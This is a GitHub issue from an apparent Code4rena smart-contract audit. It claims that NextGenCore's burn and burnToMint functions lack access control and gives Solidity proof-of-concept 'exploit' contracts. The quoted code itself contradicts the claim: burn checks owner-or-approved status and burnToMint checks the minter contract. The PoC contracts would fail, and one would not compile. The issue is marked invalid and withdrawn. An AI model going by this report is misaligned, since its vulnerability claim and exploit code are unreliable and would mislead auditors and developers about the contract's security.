Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[M-01] Public burn in the NextGenCore contract #2

Closed
c4-submissions opened this issue Oct 30, 2023 · 1 comment
Closed

[M-01] Public burn in the NextGenCore contract #2

c4-submissions opened this issue Oct 30, 2023 · 1 comment
Labels
2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value invalid This doesn't seem right withdrawn by warden Special case: warden has withdrawn this submission and it can be ignored

Comments

@c4-submissions
Copy link
Contributor

c4-submissions commented Oct 30, 2023
edited by code4rena-admin
Loading

Lines of code

https://github.com/code-423n4/2023-10-nextgen/blob/08a56bacd286ee52433670f3bb73a0e4a4525dd4/smart-contracts/NextGenCore.sol#L204-L209
https://github.com/code-423n4/2023-10-nextgen/blob/08a56bacd286ee52433670f3bb73a0e4a4525dd4/smart-contracts/NextGenCore.sol#L213-L223

Vulnerability details

Impact

The contract is utilising a public burn function.
The function is not using an access control to stop other users from burning tokens.
And, the burn function is using an address other than msg.sender.

Proof of Concept

Vulnerable burn function code snippet

// Ln 204-209
    function burn(uint256 _collectionID, uint256 _tokenId) public {
        require(_isApprovedOrOwner(_msgSender(), _tokenId), "ERC721: caller is not token owner or approved");
        require ((_tokenId >= collectionAdditionalData[_collectionID].reservedMinTokensIndex) && (_tokenId <= collectionAdditionalData[_collectionID].reservedMaxTokensIndex), "id err");
        _burn(_tokenId);
        burnAmount[_collectionID] = burnAmount[_collectionID] + 1;
    }

Exploit burn function

// SPDX-License-Identifier: MIT

pragma solidity >=0.8.19;

import "./NextGenCore.sol";

contract tNextGenCore {

   NextGenCore public x1;

   constructor(NextGenCore _x1) {

      x1 = NextGenCore(_x1);

   }

   function testBurn() public payable {

      x1.burn(uint256(35), uint256(25));

   } 

   }

Vulnerable burnToMint function code snippet

// Ln 213-223
    function burnToMint(uint256 mintIndex, uint256 _burnCollectionID, uint256 _tokenId, uint256 _mintCollectionID, uint256 _saltfun_o, address burner) external {
        require(msg.sender == minterContract, "Caller is not the Minter Contract");
        require(_isApprovedOrOwner(burner, _tokenId), "ERC721: caller is not token owner or approved");
        collectionAdditionalData[_mintCollectionID].collectionCirculationSupply = collectionAdditionalData[_mintCollectionID].collectionCirculationSupply + 1;
        if (collectionAdditionalData[_mintCollectionID].collectionTotalSupply >= collectionAdditionalData[_mintCollectionID].collectionCirculationSupply) {
            _mintProcessing(mintIndex, ownerOf(_tokenId), tokenData[_tokenId], _mintCollectionID, _saltfun_o);
            // burn token
            _burn(_tokenId);
            burnAmount[_burnCollectionID] = burnAmount[_burnCollectionID] + 1;
        }
    }

Exploit burnToMint function

// SPDX-License-Identifier: MIT

pragma solidity >=0.8.19;

import "./NextGenCore.sol";

contract tNextGenCore {

   NextGenCore public x1;

   constructor(NextGenCore _x1) {

      x1 = NextGenCore(_x1);

   }

   function testBurnB() external payable {

      x1.burnToMint(uint256(4), uint256(8), uint256(24), uint256(32), uint256(24), address(_x1));

   } 

   }

Tools Used

VS Code.

Recommended Mitigation Steps

Utilise access control modifiers on the burn function to stop other users from burning your tokens.
Assign msg.sender to the from parameter of the burn function.

Assessed type

Access Control
@c4-submissions c4-submissions added 2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working labels Oct 30, 2023
c4-submissions added a commit that referenced this issue Oct 30, 2023
@c4-submissions
debo issue #2
b4b4aa9
@code423n4 code423n4 removed bug Something isn't working edited-by-warden labels Nov 8, 2023
@code423n4
Copy link
Contributor

Withdrawn by debo

@code423n4 code423n4 added invalid This doesn't seem right withdrawn by warden Special case: warden has withdrawn this submission and it can be ignored labels Nov 8, 2023
@code4rena-admin code4rena-admin mentioned this issue Nov 10, 2023
Closed
This was referenced Nov 13, 2023
Closed
Closed
Closed
Closed
@thebrittfactor thebrittfactor mentioned this issue Nov 13, 2023
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value invalid This doesn't seem right withdrawn by warden Special case: warden has withdrawn this submission and it can be ignored
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@code423n4 @c4-submissions @code4rena-admin